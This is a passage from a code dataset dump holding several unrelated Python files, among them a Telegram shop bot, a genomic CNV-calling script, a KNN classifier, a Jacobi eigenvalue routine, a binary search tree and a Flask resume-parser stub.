wromg_attemp;\n\n if message.text in [\"All\", \"all\", \"ALL\"]:\n show_all(message, 
show_time_index)\n return 0\n\n try:\n message_text_int = int(message.text)\n except ValueError:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n\n if 0 >= message_text_int or message_text_int > available_animal:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n else:\n bot.send_photo(message.chat.id, open(\"D:/_USE_/Project_2/Bot_3/img/\"+message.text+\".jpg\", 'rb'));\n bot.send_message(message.chat.id, animals[message.text])\n show_time_index[chat_id[message.chat.id]] = False\n return 0\n\n\ndef buy_time(message):\n global availble_attemp\n global buy_time_index\n global wromg_attemp\n global language\n try:\n message_text_int = int(message.text)\n except ValueError:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n\n if 0 >= message_text_int or message_text_int > available_animal:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n else:\n bot.send_message(message.chat.id, order_text(message))\n buy_time_index[chat_id[message.chat.id]] = False\n return 0\n\n\ndef change_language(message):\n global language\n if language[chat_id[message.chat.id]]:\n language[chat_id[message.chat.id]] = 0\n bot.send_message(message.chat.id, \"Language has been change to English\")\n else:\n language[chat_id[message.chat.id]] = 1\n bot.send_message(message.chat.id, \"Язык был измененён на Русский\")\n\n@bot.message_handler(commands=[\"start\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n bot.send_message(message.chat.id, start_text(message))\n\n\n@bot.message_handler(commands=[\"help\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n bot.send_message(message.chat.id, help_text(message))\n\n\n@bot.message_handler(commands=[\"change_language\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n change_language(message)\n\n\n@bot.message_handler(commands=[\"show\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n send_message_show(message)\n global show_time_index, buy_time_index, chat_id\n show_time_index[chat_id[message.chat.id]] = True\n buy_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0;\n\n\n@bot.message_handler(commands=[\"buy\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n send_message_show(message)\n global buy_time_index, show_time_index, chat_id\n buy_time_index[chat_id[message.chat.id]] = True\n show_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0;\n\n\n@bot.message_handler(commands=[\"contact\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n mes = cotact_text(message)\n bot.send_message(message.chat.id, mes)\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n global show_time_index, buy_time_index, wromg_attemp, chat_id\n if availble_attemp <= wromg_attemp[chat_id[message.chat.id]]:\n buy_time_index[chat_id[message.chat.id]] = False\n show_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0\n bot.send_message(message.chat.id, sorry_text(message))\n elif show_time_index[chat_id[message.chat.id]]:\n show_time(message)\n elif buy_time_index[chat_id[message.chat.id]]:\n buy_time(message)\n else:\n bot.send_message(message.chat.id, 
sorry_text(message))\n\n\nbot.polling(none_stop=True, interval=0)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158915917","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n File Name: online_call.py\n Description:\n\nCreated by Yu Liu on 2019/9/29 10:57 PM.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nimport h5py\n\nimport online.GPUtil as GPU\nimport glob\nimport logging\n\nimport os\nimport time\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass CNVNetwork:\n\n def __init__(self, weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, l2ratio, temp):\n import tensorflow as tf\n from keras import backend as K\n from model import cnv_net\n\n K.clear_session()\n config = tf.ConfigProto()\n config.gpu_options.per_process_gpu_memory_fraction = 0.2 # (2core)0.3->0.15(4core)\n sess = tf.Session(config=config)\n K.set_session(sess)\n\n model_name = 'cnvnet'\n self.model = cnv_net(win_size, n_feat, n_class, filters=32, kernel_size=128, strides=1, pool_size=2,\n pool_stride=2, drop=drop, blocks=_blocks, fc_size=fc_size,\n kernel_regular_l2=l2ratio, temperature=temp, m_name=model_name)\n self.model.load_weights(weight_path)\n\n def predict(self, in_data, batch_size=None):\n\n with h5py.File(in_data, 'r') as i_fn_read:\n i_fn_pred_meta = i_fn_read.get('pred_meta').value\n i_fn_pred_feat = i_fn_read.get('pred_feat').value\n i_feat_arr = np.array(i_fn_pred_feat)\n del i_fn_pred_feat\n\n ypred = self.model.predict(i_feat_arr, batch_size=batch_size)\n del i_feat_arr\n return i_fn_pred_meta, ypred, in_data\n\n\ndef job_wraper(func_param):\n return pool_job(*func_param)\n\n\ndef pool_job(weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, in_data, batch_size,\n l2rate, temperature_scale):\n model = CNVNetwork(weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, l2rate, temperature_scale)\n return model.predict(in_data, batch_size)\n\n\ndef online_call_mp_gpu_1(online_seg_data_root_dir, online_call_out_root_dir, model_in_root_dir,\n n_win_size=1000, n_feat=13, n_class=3,\n epochs=100, batch=1024, learn_rate=0.001, drop=0.2,\n fc_size=64, blocks='4_4_3', step_size=200,\n l2r=1e-4, temperature=5, lbl_smt_frac=0.1, pw=0,\n sample_id='NA12878', chr_id='1', min_ratio=0.1, seg_range='a', n_proc=10):\n\n \n filters=32\n kernel_size=128\n strides=1\n pool_size=2\n pool_stride=2\n \n _blocks = tuple(int(x) for x in blocks.split('_'))\n def out_name():\n str_blocks = [str(x) for x in blocks.split('_')]\n str_blk = ''.join(str_blocks)\n return 'b{0}_ep{1}_lr{2:.3f}_dr{3:.1f}_fc{4}_' \\\n 'blk{5}_win{6}_l2r{7}_temp{8}_lblsmt{9}_pw{10}_' \\\n 'filters_{11}_kernelsize{12}_strides{13}_poolsize{14}_poolstride{15}'.format(batch,\n epochs,\n learn_rate,\n drop,\n fc_size,\n str_blk,\n n_win_size,\n str(l2r),\n temperature,\n int(lbl_smt_frac) if lbl_smt_frac == 0 else lbl_smt_frac,\n pw,\n filters,\n kernel_size,\n strides,\n pool_size,\n pool_stride)\n\n # set enviornment\n time.sleep(10)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n logger.info('waiting available gpu device...')\n while True:\n gpu_id_lst = GPU.getFirstAvailable(order='random', maxMemory=0.001, maxLoad=0.001, attempts=50, interval=60)\n if len(gpu_id_lst) > 0:\n break\n logger.info('processing on device id 
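# Design note (sketch, not from the original file; requires Python 3.7+): the
# bot above tracks per-chat state in four parallel lists indexed through the
# chat_id/chat_index bookkeeping. A single mapping from chat id to a small
# state object removes that bookkeeping entirely:
from dataclasses import dataclass

@dataclass
class ChatState:
    language: int = 1        # 1 = Russian, 0 = English (as in the lists above)
    show_time: bool = False
    buy_time: bool = False
    wrong_attempts: int = 0

chats = {}                   # message.chat.id -> ChatState

def state_for(message):
    return chats.setdefault(message.chat.id, ChatState())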
{}...'.format(gpu_id_lst[0]))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(gpu_id_lst[0])\n\n model_name = 'cnvnet'\n model_weight_fn = os.path.join(model_in_root_dir, out_name() + '-' + model_name + '.hdf5')\n if not os.path.exists(model_weight_fn):\n raise FileNotFoundError('model weight file not found. {}'.format(model_weight_fn))\n\n # load data\n # default: online_seg_data_root_dir = '/zfssz2/ST_MCHRI/BIGDATA/PROJECT/NIPT_CNV/f_cnv_out/online'\n online_seg_data_subroot_dir = os.path.join(online_seg_data_root_dir, sample_id + '/data')\n if not os.path.isdir(online_seg_data_subroot_dir):\n raise FileNotFoundError('No segments generated for sample {}, chr {}'.format(sample_id, chr_id))\n\n part_fname = 'win{0}_step{1}_r{2:.2f}_chr{3}_seg_'.format(n_win_size, step_size, min_ratio, chr_id)\n # create out dir\n # default: online_call_out_root_dir = '/zfssz2/ST_MCHRI/BIGDATA/PROJECT/NIPT_CNV/f_cnv_out/online'\n online_call_out_subroot_dir = os.path.join(online_call_out_root_dir, sample_id + '/cnv_call')\n if not os.path.isdir(online_call_out_subroot_dir):\n os.makedirs(online_call_out_subroot_dir)\n call_out_fn = os.path.join(online_call_out_subroot_dir,\n 'win{0}_step{1}_r{2:.2f}_chr{3}-cnv-call-'.format(\n n_win_size, step_size, min_ratio, chr_id))\n if seg_range != 'a': # if not whole chr\n part_fname = part_fname + 'p-' + seg_range + '_'\n call_out_fn = call_out_fn + 'p-' + seg_range + '-'\n else:\n part_fname = part_fname + 'a_'\n call_out_fn = call_out_fn + 'a-'\n\n call_out_fn = call_out_fn + 'result-mp-gpu-pw{}.csv'.format(pw)\n\n if os.path.exists(call_out_fn):\n os.remove(call_out_fn)\n\n gap_h5_fn = os.path.join(online_seg_data_subroot_dir, part_fname+'gap.h5')\n gap_pred = None\n if os.path.exists(gap_h5_fn):\n with h5py.File(gap_h5_fn, 'r') as gap_fn_read:\n gap_obj = gap_fn_read.get('gap')\n if gap_obj:\n gap_result = gap_obj.value\n # logger.info('gap_result shape: {}'.format(gap_result.shape))\n tmp_arr = np.full((gap_result.shape[0], 4), -1)\n # tmp_arr[:] = np.nan\n gap_pred = np.concatenate((gap_result, tmp_arr), axis=1)\n del tmp_arr\n\n unpred_h5_fn_list = glob.glob(os.path.join(online_seg_data_subroot_dir, part_fname+'unpred_*'))\n f_unpred_arr = None\n for i_unpred_fn in unpred_h5_fn_list:\n with h5py.File(i_unpred_fn, 'r') as i_uppred_fn_read:\n i_unpred_meta = i_uppred_fn_read.get('unpred_meta').value\n i_unpred_meta_arr = np.array(i_unpred_meta)\n # logger.info('i_unpred_meta_arr shape: {}'.format(i_unpred_meta_arr.shape))\n tmp_arr = np.full((i_unpred_meta_arr.shape[0], 4), -1)\n # tmp_arr[:] = np.nan\n\n if f_unpred_arr is None:\n f_unpred_arr = np.concatenate((i_unpred_meta_arr, tmp_arr), axis=1)\n else:\n unpred_arr = np.concatenate((i_unpred_meta_arr, tmp_arr), axis=1)\n f_unpred_arr = np.concatenate((f_unpred_arr, unpred_arr), axis=0)\n\n pred_h5_fn_list = glob.glob(os.path.join(online_seg_data_subroot_dir, part_fname+'pred_*'))\n\n logger.info('calling cnv...')\n f_pred_res = None\n total_fn = len(pred_h5_fn_list)\n\n func_parmas = []\n for i_fn in pred_h5_fn_list:\n func_parmas.append((model_weight_fn, n_win_size, n_feat,\n n_class, drop, _blocks, fc_size, i_fn, batch, l2r, temperature))\n\n with mp.Pool(n_proc) as p:\n results = p.imap(job_wraper, func_parmas)\n for idex, (i_pred_meta, i_ypred, i_fn) in enumerate(results):\n logger.info('finished {}/{}, {}'.format(idex+1, total_fn, i_fn))\n assert len(i_pred_meta) == i_ypred.shape[0]\n ypred_l = np.argmax(i_ypred, axis=1)\n\n if f_pred_res is None:\n f_pred_res = np.concatenate((np.array(i_pred_meta), 
i_ypred, ypred_l[:, np.newaxis]), axis=1)\n else:\n i_pred_res = np.concatenate((np.array(i_pred_meta), i_ypred, ypred_l[:, np.newaxis]), axis=1)\n f_pred_res = np.concatenate((f_pred_res, i_pred_res), axis=0)\n\n logger.info('combining and sorting results...')\n # check\n # logger.info('gap_pred shape {}, f_unpred_arr shape {}, f_pred_res shape {}'.format(gap_pred.shape, f_unpred_arr.shape, f_pred_res.shape))\n if gap_pred is not None and f_unpred_arr is not None and f_pred_res is not None:\n whl_cnv_re = np.concatenate((gap_pred, f_unpred_arr, f_pred_res), axis=0)\n elif gap_pred is not None and f_unpred_arr is not None and f_pred_res is None:\n whl_cnv_re = np.concatenate((gap_pred, f_unpred_arr), axis=0)\n elif gap_pred is not None and f_pred_res is not None and f_unpred_arr is None:\n whl_cnv_re = np.concatenate((gap_pred, f_pred_res), axis=0)\n elif gap_pred is None and f_unpred_arr is not None and f_pred_res is not None:\n whl_cnv_re = np.concatenate((f_unpred_arr, f_pred_res), axis=0)\n elif f_pred_res is None and f_unpred_arr is None and gap_pred is not None:\n whl_cnv_re = gap_pred.copy()\n elif gap_pred is None and f_unpred_arr is None and f_pred_res is not None:\n whl_cnv_re = f_pred_res.copy()\n elif f_pred_res is None and gap_pred is None and f_unpred_arr is not None:\n whl_cnv_re = f_unpred_arr.copy()\n\n del gap_pred, f_unpred_arr, f_pred_res\n\n ind = np.argsort(whl_cnv_re[:, 0])\n whl_cnv_re = whl_cnv_re[ind]\n\n out_df = pd.DataFrame(data=whl_cnv_re,\n columns=['seg_s', 'seg_e', 'seg_l', 'indicator', 'cov_ratio', 'p_neu', 'p_del', 'p_dup', 'pred_l'])\n out_df[['seg_s', 'seg_e', 'seg_l', 'indicator', 'pred_l']] = out_df[\n ['seg_s', 'seg_e', 'seg_l', 'indicator', 'pred_l']].astype(int)\n out_df.to_csv(call_out_fn, index=False, sep='\\t')\n logger.info('Done, online cnv call results saved into {}'.format(call_out_fn))\n\n\n\n\n\n\n\n\n\n","sub_path":"online/online_call_mp_gpu_1.py","file_name":"online_call_mp_gpu_1.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165024068","text":"# python3 test.py [v]\n\nimport sys\nif len(sys.argv) == 2:\n v = sys.argv[1]\nelse:\n v = '1'\n\nname = 'keyboard-row'\nfrom importlib.machinery import SourceFileLoader\nmodule = SourceFileLoader('', name + '.' 
+ v + '.py').load_module()\n\ndef test(s, input, exp):\n print('----------')\n words = input\n print('words:', words)\n print('expect:', exp)\n res = s.findWords(words)\n print('result:', res)\n if sorted(exp) != sorted(res):\n print('--- ERROR ---')\n print()\n\ns = module.Solution()\n\n# -----\ninput = ['ABc', 'mN', '']\nexp = ['mN', '']\ntest(s, input, exp)\n\n# -----\ninput = ['Hello', 'Alaska', 'Dad', 'Peace']\nexp = ['Alaska', 'Dad']\ntest(s, input, exp)\n","sub_path":"juice/leet/0500/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136687264","text":"import numpy as np\nimport sys\nimport math\nfrom numpy.linalg import norm\nfrom updateOBB_v2 import updateOBB_v2\nfrom gen2dOffset_v2 import gen2dOffset_v2\nfrom genTransMat import genTransMat\nsys.path.append('../vistools')\n\ndef genOffsetRep( data, labelset ):\n #GENOFFSETREP transform the data into offset format.\n # INPUT: data - the data is a struct with\n # \"kids\" (hierarchy) and\n # \"obblist\" (boxes with absolute positions)\n # \"labellist\" (labels of the boxes)\n # \"layers\" (layers of the boxes)\n # labelset - the category list for this dataset\n #\n # OUTPUT: ndata - the ndata is a struct with\n # \"kids\" (hierarchy) the same with input\n # \"leafreps\" (layer+label of boxes)\n # \"relposreps\" (relative positions between siblings)\n\n #addpath(genpath('..\\0-data'))\n\n kids = data['kids']\n obblist = data['obblist']\n labellist = data['labellist']\n leafnum = obblist.shape[1]\n nodenum = len(kids)\n\n ## extract the sizes\n sizevec = obblist[9:12]\n\n ## extract the layers\n # if(isfield(data,'layers'))\n # layers = data.layers\n # end\n\n ## extract the labels\n classnum = len(labelset)\n labelvecs = np.zeros([classnum, len(labellist)])\n for i in range(leafnum):\n label = labellist[i]\n ind = [i for i, val in enumerate(labelset) if val == label]\n labelvecs[ind, i] = 1\n\n ## compute the relative positions\n # 1. 
update the boxes of the internal nodes\n obblist = obblist[:12]\n for j in range(leafnum, nodenum):\n k = kids[j]\n flag = k[0]\n if flag == 1:\n # support\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obblist = np.c_[ obblist, pobb ]\n #obblist[:,j] = pobb\n\n elif flag == 2:\n # group\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n len1 = norm(obb1[9:12], 2)\n len2 = norm(obb2[9:12], 2)\n if len1 > len2:\n pobb = updateOBB_v2(obb1, obb2)\n else:\n pobb = updateOBB_v2(obb2, obb1)\n k[1], k[2] = k[2], k[1]\n\n obblist = np.c_[ obblist, pobb ]\n\n elif flag == 3:\n # surround\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n obb3 = obblist[:,k[3] - 1]\n cent1 = obb1[0:3]\n front1 = obb1[3:6]\n up1 = obb1[6:9]\n cent2 = obb2[0:3]\n front2 = cent2 - cent1\n cent3 = obb3[0:3]\n front3 = cent3 - cent1\n transform = genTransMat(front1, up1)\n front2 = transform.dot(front2)\n front2 = front2 / norm(front2)\n degree2 = math.atan(front2[2] / front2[0]) * 180 / math.pi\n if front2[0] < 0:\n if degree2 < 0:\n degree2 = degree2 - 180\n else:\n degree2 = degree2 + 180\n\n degree2 = degree2 % 360\n front3 = transform.dot(front3)\n front3 = front3 / norm(front3)\n degree3 = math.atan(front3[2] / front3[0]) * 180 / math.pi\n if front3[0] < 0:\n if degree3 < 0:\n degree3 = degree3 - 180\n else:\n degree3 = degree3 + 180\n\n degree3 = degree3 % 360\n if degree3 < degree2:\n obb2, obb3 = obb3, obb2\n k[2], k[3] = k[3], k[2]\n\n pobb = updateOBB_v2(obb1, obb2)\n pobb = updateOBB_v2(pobb, obb3)\n obblist = np.c_[ obblist, pobb ]\n elif flag == 4:\n # room\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obb2 = obblist[:,k[3] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obb2 = obblist[:,k[4] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obb2 = obblist[:,k[5] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obblist = np.c_[ obblist, pobb ]\n elif flag == 5:\n # wall\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obblist = np.c_[ obblist, pobb ]\n\n kids[j] = k\n\n\n ## splitting walls\n # for i = 1:len(kids)\n # k = kids{i}\n # \tif(k(1)==5)\n # box1 = obblist[:,k[1] - 1]\n # box2 = obblist[:,k[2] - 1]\n # [ rp, psize3,delta_midy ] = gen2dOffset_v2( box1, box2, 1 )\n # sizevec(3,k[1]] = psize3\n # obblist[12,k[1]] = psize3\n # cent1 = obblist[1:3,k[1]]\n # front1 = obblist[4:6,k[1]]\n # up1 = obblist[7:9,k[1]]\n # axes1 = cross(front1,cent1)\n # axes1 = axes1/norm(axes1,2)\n # cent1 = cent1-axes1*delta_midy\n # obblist[1:3,k[1]] = cent1\n # obblist[:,i) = updateOBB_v2(obblist(:,k[1]], obblist[:,k[2] - 1])\n # end\n # if(k(1)==4)\n # obb1 = obblist[:,k[1] - 1]\n # obb2 = obblist[:,k[2] - 1]\n # pobb = updateOBB_v2(obb1, obb2)\n # obb2 = obblist[:,k[3] - 1]\n # pobb = updateOBB_v2(pobb, obb2)\n # obb2 = obblist[:k[4]]\n # pobb = updateOBB_v2(pobb, obb2)\n # obb2 = obblist[:k[5]]\n # pobb = updateOBB_v2(pobb, obb2)\n # obblist[:,i) = pobb\n # end\n # end\n\n # 2. 
compute the relative positions between childen and parents\n relposreps = [ [] for i in range(leafnum) ]\n\n for i in range(leafnum, nodenum):\n # pobb = obblist[:,i]\n k = kids[i]\n rplist =[]\n if len(k) > 2:\n box1 = obblist[:,k[1] - 1]\n for j in range(2, len(k)):\n box2 = obblist[:,k[j] - 1]\n\n # compute the relative positions between two boxes\n rp, _, _ = gen2dOffset_v2( box1, box2, 0 )\n rplist.append(rp)\n\n relposreps.append(rplist)\n\n lastmerge = kids[-1]\n wallidx = lastmerge[2:]\n rplist = []\n box1 = obblist[:,lastmerge[1] - 1]\n for i in range(len(wallidx)):\n box2 = obblist[:, wallidx[i] - 1]\n rp, _, _ = gen2dOffset_v2(box1, box2, 0)\n rplist.append(rp)\n box1 = box2\n\n relposreps[-1] = rplist\n\n # colorlist = {'r','y','g','b'}\n # for i = 1:len(wallidx)\n # if(wallidx(i)>leafnum)\n # k = kids{wallidx(i)}\n # draw3dOBB_v2(obblist(:,k[1]],colorlist{i})\n # draw3dOBB_v2(obblist(:,k[2]],colorlist{i})\n # else\n # draw3dOBB_v2(obblist(:,wallidx(i)),colorlist{i})\n # end\n # end\n # close gcf\n\n ## 3. compute the attachment to the walls\n # wallattachment = []\n # for i = 1:size(obblist,2)\n # obb = obblist[:,i)\n # wallattach = zeros(size(data.walllist,2),1)\n # for j = 1:size(data.walllist,2)\n # wobb = data.walllist(:,j)\n # dist = obbdist(obb',wobb')\n # wallattach(j) = dist<0.01\n # end\n # wallattachment = [wallattachment,wallattach]\n # end\n\n ## form the leafreps\n leafreps = labelvecs\n # if(exist('layers','var'))\n # leafreps = [layers';leafreps]\n # end\n leafreps = np.r_[sizevec, leafreps]\n\n ## form the ndata\n ndata = {}\n ndata['kids'] = kids\n ndata['leafreps'] = leafreps\n ndata['relposreps'] = relposreps\n # ndata.wallattachment = wallattachment\n\n return ndata","sub_path":"3-datapreparation/genOffsetRep.py","file_name":"genOffsetRep.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19690611","text":"class BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n # Insert the given value into the tree\n def insert(self, value):\n # Compare to root node\n # If lesser go to left child\n if (value < self.value):\n if (self.left is None):\n # insert\n self.left = BinarySearchTree(value)\n else:\n # move left\n self.left.insert(value)\n # If greater or equal to, go right\n elif (value >= self.value):\n if (self.right is None):\n # insert\n self.right = BinarySearchTree(value)\n else:\n # move right and go through insert function\n self.right.insert(value) \n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n # If root is target, return\n if (target == self.value):\n return True\n elif (target < self.value):\n if (self.left is None):\n return False\n else:\n # move left\n # repeat\n return self.left.contains(target)\n elif (target > self.value):\n if (self.right is None):\n return False\n else:\n # move right\n # repeat\n return self.right.contains(target)","sub_path":"names/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152110973","text":"#from statistics import median\n#import collections\n#aa = collections.Counter(a) # list to list || .most_common(2)で最大の2���とりだせるお a[0][0]\nfrom fractions import gcd\nfrom itertools import combinations,permutations,accumulate # (string,3) 3回\n#from collections import 
deque\nfrom collections import deque,defaultdict,Counter\nimport decimal\nimport re\n#import bisect\n#\n# d = m - k[i] - k[j]\n# if kk[bisect.bisect_right(kk,d) - 1] == d:\n#\n#\n#\n# If plain Python is too slow, resubmitting with PyPy may pass!!\n#\n#\n# my_round_int = lambda x:np.round((x*2 + 1)//2)\n# round half up\nimport sys\nsys.setrecursionlimit(10000000)\nmod = 10**9 + 7\n#mod = 9982443453\ndef readInts():\n    return list(map(int,input().split()))\ndef I():\n    return int(input())\nn,k = readInts()\ndef calc(a):\n    sml = (0 + a-1) * a //2\n    lar = sml + a * (n-a+1)\n    return lar - sml + 1\nans = 0\nfor i in range(k,n+2):\n    ans += calc(i) % mod\nprint(ans % mod)\n","sub_path":"Python_codes/p02708/s657466534.py","file_name":"s657466534.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"546134999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 10:56:21 2019\n\n@author: 17pd04\n\"\"\"\n\nimport xlrd as xl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\n\ndef split(data):\n    x = []\n    y = []\n    for i in range(len(data)):\n        x.append(data[i][0])\n        y.append(data[i][1])\n    return x,y\n\ndef KNN(x,test_x,K):\n    dist = []\n\n    for i in range(len(x)):\n        dist.append(m.sqrt((x[i][0] - test_x[0])**2 + (x[i][1] - test_x[1])**2 ))\n\n    x_dist = list(zip(dist,x,y))\n    x_dist.sort()\n\n    count0 = 0\n    count1 = 0\n\n    for i in range(K):\n        if(x_dist[i][2] == 0):\n            count0 += 1\n        elif(x_dist[i][2] == 1):\n            count1 += 1\n\n    if(count0 > count1):\n        return 0\n    elif(count1 > count0):\n        return 1\n\nwb = xl.open_workbook(\"data.xlsx\")\nsheet = wb.sheet_by_index(0)\n\ndata = []\nx = []\ny = []\ny_name = ''\nfeature_name = []\nK = 3\n\nno_of_col = sheet.ncols\n\n\nfor i in range(no_of_col):\n    data.append(sheet.col_values(i))\n\ny.extend(data.pop(no_of_col-1))\n\ny_name = y.pop(0)\n\nfor i in range(len(data)):\n    feature_name.append(data[i].pop(0))\n\nx = np.transpose(data).astype(int)\n\nx0,y0 = [],[]\nx1,y1 = [],[]\nclass0,class1 = [],[]\nfor i in range(len(x)):\n    if(y[i] == 0):\n        class0.append(x[i])\n    elif(y[i] == 1):\n        class1.append(x[i])\n\nx0,y0 = split(class0)\nx1,y1 = split(class1)\n\n\nplt.scatter(x0,y0,c = 'r')\nplt.scatter(x1,y1,c = 'g')\n\ntest_x = [6,1]\n\nfor i in range(1,8):\n    test_y = KNN(x,test_x,i)\n    print(\"For K = \",i,\", the test data belongs to class \",test_y)\n\n\n#print(\"Enter the test data : \")\n#for i in range(len(feature_name)):\n#    print(\"Enter the \",feature_name[i])\n#    temp = int(input())\n#    test_x.append(temp)\n\n#print(\"For K = \",K,\", the test data belongs to class \",test_y)\nplt.scatter(test_x[0],test_x[1])\nplt.legend(['Red = Class 0','Green = Class 1','Blue = Test Data'],loc = 'best')","sub_path":"KNN-classifier.py","file_name":"KNN-classifier.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591374573","text":"import os\nimport sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nimport utils.config\nimport logging\nimport cv2\n\nfrom video_processing.io import VideoCapture\n\n\ndef show_video(video_name, output_dir = \"\"):\n    vc = VideoCapture(video_name)\n\n    while True:\n        ret = vc.read()\n        if ret:\n            vc.imshow(window_name=\"show\")\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n            elif cv2.waitKey(1) & 0xFF == ord('s') and output_dir != \"\":\n                vc.save(output_dir)\n        else:\n            break\n\n    del vc\n\nif __name__ == \"__main__\":\n    import argparse\n    parser = 
argparse.ArgumentParser()\n    parser.add_argument('-i', help='path to video')\n    parser.add_argument('-o', default=\"\", help='path to dir for img save')\n\n    args = parser.parse_args()\n\n    video_name = args.i\n    output_dir = args.o\n\n    show_video(video_name, output_dir)","sub_path":"src/show_video.py","file_name":"show_video.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384220606","text":"import numpy as np\nimport math\n\n\ndef jacobi(A, N=100, eps=10e-3):\n\n\tdim = A.shape[0]\n\n\tev = np.matrix(np.identity(dim))\n\tn = N\n\n\twhile(True):\n\t\tabsA = np.abs(A)\n\n\t\t# zero the diagonal so argmax finds the largest off-diagonal entry\n\t\tabsA = absA - np.diagflat(np.diag(absA))\n\n\t\taxis = np.argmax(absA)\n\t\tp = axis // dim\n\t\tq = axis % dim\n\n\t\tif abs(A[p,q]) < eps:\n\t\t\tbreak\n\n\t\tif not p > q:\n\t\t\tpp = p\n\t\t\tp = q\n\t\t\tq = pp\n\n\n\t\talpha = (A[p,p] - A[q,q])\n\t\tbeta = - A[p,q]\n\t\tgamma = abs(alpha) / math.sqrt(alpha * alpha + beta * beta)\n\n\t\tcos = math.sqrt((1 + gamma) / 2)\n\t\tsin = math.copysign(math.sqrt((1 - gamma) / 2), alpha * beta)\n\n\t\ta = A.copy()\n\n\t\t# apply the rotation to rows p,q and columns p,q\n\t\tfor i in range(dim):\n\t\t\ta[p,i] = cos * A[p,i] - sin * A[q,i]\n\t\t\ta[q,i] = sin * A[p,i] + cos * A[q,i]\n\t\t\ta[i,p] = cos * A[i,p] - sin * A[i,q]\n\t\t\ta[i,q] = sin * A[i,p] + cos * A[i,q]\n\n\t\ta[p,q] = 0\n\t\ta[q,p] = 0\n\n\t\tA = a.copy()\n\n\t\tn -= 1\n\t\tif n < 0:\n\t\t\tbreak\n\n\treturn A\n\nif __name__ == '__main__':\n\tA = np.array([[1., 0], [0, 1]])\n","sub_path":"jacobi/jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288552223","text":"import os\n\nfrom flask import Flask, jsonify, request, flash\n\nfrom utils import extract_text_from_pdf, extract_name, extract_mobile_numbers, extract_emails, extract_skills, \\\n    get_skills\n\nUPLOAD_FOLDER = 'upload'\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nALLOWED_EXTENSIONS = set(['pdf'])\n\n\ndef allowed_file(filename):\n    return '.' 
